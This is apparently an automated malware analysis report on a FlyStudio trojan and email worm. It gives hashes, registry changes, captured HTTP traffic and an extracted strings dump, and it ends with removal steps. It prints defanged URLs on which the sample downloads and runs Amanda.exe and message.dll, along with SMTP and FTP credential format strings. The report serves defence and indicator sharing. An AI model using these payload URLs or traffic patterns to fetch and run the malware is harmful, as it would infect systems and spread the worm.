Trojan.Win32.FlyStudio_35e87b75f2
Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 35e87b75f290dcbe39eecf52381d7459
SHA1: 01394dc8d0c0e9accfa717424c3d452e69920ca9
SHA256: 3ac3b6a3acb9d69b1ada6afc49a5649da0fb83298ad67573bc3deebae915b5f7
SSDeep: 12288:2BpNBtPgZts9i 4WI 0s0GZ7boosmCXKOfyWOFeI2F/nbr:ynBtPStss 4WoshZFsmCXbyZeI2Vnf
Size: 929792 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: Mail.Ru
Created at: 2017-01-18 15:36:03
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3436
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
No files have been created.
Registry activity
The process %original file name%.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\35e87b75f290dcbe39eecf52381d7459_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
| MD5 | File path |
|---|---|
| aa6018bc373aac97e1857d0ca7f9aa1d | c:\Amanda.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.dywt.com.cn)
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 626406 | 626688 | 4.56748 | 2825fdf272c56162fa14e35c88f1e9e7 |
| .rdata | 630784 | 180124 | 180224 | 4.50828 | ca0e545773fbc1f2faa722a42508cf67 |
| .data | 811008 | 263496 | 90112 | 3.67131 | 4489f849d064cb0ee150981248bad5f6 |
| .rsrc | 1077248 | 24788 | 28672 | 3.64703 | 0c0906bae5b17a82ec6d40d158acb865 |
Dropped from:
Downloaded by:
aa6018bc373aac97e1857d0ca7f9aa1d
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://u955.v.qingcdn.com/版本å·.txt | |
| hxxp://u755.v.qingcdn.com/Amanda.exe | |
| hxxp://u755.v.qingcdn.com/message.dll | |
| hxxp://o9fqva4p0.bkt.clouddn.com/Amanda.exe | |
| hxxp://o9fqva4p0.bkt.clouddn.com/版本å·.txt | |
| hxxp://o9fqva4p0.bkt.clouddn.com/message.dll | |
| dns.msftncsi.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /message.dll HTTP/1.1
Host: o9fqva4p0.bkt.clouddn.com
Accept: */*
Referer: hXXp://o9fqva4p0.bkt.clouddn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Date: Tue, 28 Feb 2017 11:46:04 GMT
Content-Type: application/x-msdownload
Content-Length: 757760
Connection: close
Server: openresty
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Log, X-Reqid
Access-Control-Max-Age: 2592000
Cache-Control: public, max-age=31536000
Content-Disposition: inline; filename="message.dll"
Content-Transfer-Encoding: binary
ETag: "FikUcN-q_-_bDoauCjiVQJCwTyJy"
Last-Modified: Wed, 18 Jan 2017 13:38:36 GMT
X-Log: mc.g/404;mc.g;RS;mc.s:13;IO:35
X-M-Log: QNM:xs444;QNM2:11
X-M-Reqid: WRsAAMiCHTtSNpsU
X-Qiniu-Zone: 0
X-Qnm-Cache: Hit
X-Reqid: WRsAAMcPpGNX4ZoU
X-Ser: BC83_dx-shandong-qingdao-1-cache-2, BC116_dx-henan-luoyang-2-cache-4
X-Cache: HIT from BC116_dx-henan-luoyang-2-cache-4(baishan)
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......Py0...^...^.
..^.o.R...^...P.?.^.">T...^.">U.B.^.B.M.8.^.v.M...^..._.Z.^...U.
_.^...T...^...^...^...X...^..8Z...^.Rich..^.........................PE
..L....o.X...........!................................................
.................................................................@..\Y
......................Ls..............................................
.....................................text.............................
.. ..`.rdata...*.......0..................@..@.data....J....... ......
............@....rsrc...\Y...@...`..................@..@.reloc..`.....
... ...p..............@..B............................................
<<< skipped >>>
GET /Amanda.exe HTTP/1.1
Host: o9fqva4p0.bkt.clouddn.com
Accept: */*
Referer: hXXp://o9fqva4p0.bkt.clouddn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Date: Tue, 28 Feb 2017 11:45:26 GMT
Content-Type: application/x-msdownload
Content-Length: 2699264
Connection: close
Server: openresty
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Log, X-Reqid
Access-Control-Max-Age: 2592000
Cache-Control: public, max-age=31536000
Content-Disposition: inline; filename="Amanda.exe"
Content-Transfer-Encoding: binary
ETag: "FoDR4g8HMCFUErWHc683si_Rf5ZX"
Last-Modified: Tue, 24 Jan 2017 06:31:18 GMT
X-Log: mc.g/404;mc.g;RS;mc.s;IO:7
X-M-Log: QNM:xs436;QNM2:160
X-M-Reqid: EWsAAOfgPcKXl6AU
X-Qiniu-Zone: 0
X-Qnm-Cache: Hit
X-Reqid: EWsAAGN_nXl5oZwU
X-Ser: BC25_dx-lt-hebei-shijiazhuang-2-cache-5, BC94_dx-henan-luoyang-2-cache-1
X-Cache: HIT from BC94_dx-henan-luoyang-2-cache-1(baishan)
MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$..............K...K
...K...K...K...K...K...K...K...K...KV..K...K...K...K...K...KV..K...K..
.K...K...K...K=..K...K=..K...K...K...K...K...KRich...K................
........PE..L......X.............................=............@.......
.................................................................. .&.
h....0-...............................................................
...............................................text...................
............ ..`.rdata..............................@..@.data....y....
&.......&.............@....rsrc........0-......`(.............@..@....
<<< skipped >>>
GET /版本å·.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: o9fqva4p0.bkt.clouddn.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 28 Feb 2017 11:45:03 GMT
Content-Type: text/plain
Content-Length: 5
Connection: keep-alive
Server: openresty
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Log, X-Reqid
Access-Control-Max-Age: 2592000
Cache-Control: public, max-age=31536000
Content-Disposition: inline; filename="版本å·.txt"
Content-Transfer-Encoding: binary
ETag: "FgZ1LS-3_mX2GPQKmjPr5MyOIEMX"
Last-Modified: Tue, 24 Jan 2017 06:31:17 GMT
Vary: Accept-Encoding
X-Log: mc.g:1/404;mc.g;RS;mc.s;IO:132
X-M-Log: QNM:xs467;QNM2:156
X-M-Reqid: jAMAAIchB0_1mKAU
X-Qiniu-Zone: 0
X-Qnm-Cache: Hit
X-Reqid: jAMAAPYWvNZ6oZwU
X-Ser: BC15_dx-lt-yd-zhejiang-huzhou-2-cache-4, BC24_dx-henan-luoyang-2-cache-8
X-Cache: HIT from BC24_dx-henan-luoyang-2-cache-8(baishan)
3.2.6
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
K(.wS
hXXp://o9fqva4p0.bkt.clouddn.com/版本å·.txt
\Amanda.exe
Amanda.exe
\message.dll
hXXp://o9fqva4p0.bkt.clouddn.com/Amanda.exe
Amanda.exe
message.dll
hXXp://o9fqva4p0.bkt.clouddn.com/message.dll
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
Adobe Photoshop CS5 Windows
2016:06:20 13:05:02
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmp:CreateDate="2016-06-20T13:02:43 08:00" xmp:ModifyDate="2016-06-20T13:05:02 08:00" xmp:MetadataDate="2016-06-20T13:05:02 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:6F95E2BDA236E6118081BE908546A5F9" xmpMM:DocumentID="xmp.did:6E95E2BDA236E6118081BE908546A5F9" xmpMM:OriginalDocumentID="xmp.did:6E95E2BDA236E6118081BE908546A5F9"> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>FDDAF324562CCAF98AD0878DF6C38ECD</rdf:li> <rdf:li>adobe:docid:photoshop:a043a76b-fd6e-11e1-97b0-f6ab5068cc11</rdf:li> <rdf:li>adobe:docid:photoshop:a650e4b2-ea8a-11e1-b87e-d4152676a408</rdf:li> <rdf:li>uuid:344316114DABE311A76CC07415A76379</rdf:li> <rdf:li>xmp.did:2DB840ACA1DFE211B2DBAC62071392BE</rdf:li> <rdf:li>xmp.did:33FE99049FDFE211B02DC4A632305F66</rdf:li> <rdf:li>xmp.did:4DFB0091418DE211B7A9A5551920B8D0</rdf:li> <rdf:li>xmp.did:79D222771D8DE21189C9B809F441AEBB</rdf:li> <rdf:li>xmp.did:81705823505EE311BDC7E69C1E3C0513</rdf:li> <rdf:li>xmp.did:9E4497AE9836E6118B329346CAAD0A56</rdf:li> <rdf:li>xmp.did:A08F306EB9DFE211B480FDAA05312368</rdf:li> <rdf:li>xmp.did:B0EA94F7BD03E311B71FC5CF99B624FB</rdf:li> <rdf:li>xmp.did:C1E59A82E8B6E2118115A10488109247</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:6E95E2BDA236E6118081BE908546A5F9" stEvt:when="2016-06-20T13:02:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 
Windows"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/png to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:6F95E2BDA236E6118081BE908546A5F9" stEvt:when="2016-06-20T13:05:02 08:00" stEvt:softwareAgent="Adobe Photoshop CS5 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
VO%Xi"r5
UMSG$PGYS
#W%Du
!%%C!
l.ofk
<U_wcrT5(b
`.yws
C%FKg
cOL
/%Xmj=m
x.nn#
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
RASAPI32.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.1
hXXp://
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
3.2.6
ssage.dll 100%
GET /message.dll HTTP/1.1
Host: o9fqva4p0.bkt.clouddn.com
Referer: hXXp://o9fqva4p0.bkt.clouddn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
%%%)***1///62228///6)))2$$$
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
PADPADDINGXXPADDING
(*.*)
1.0.0.0
(hXXp://VVV.dywt.com.cn)
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3436
- Delete the original Trojan file.
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.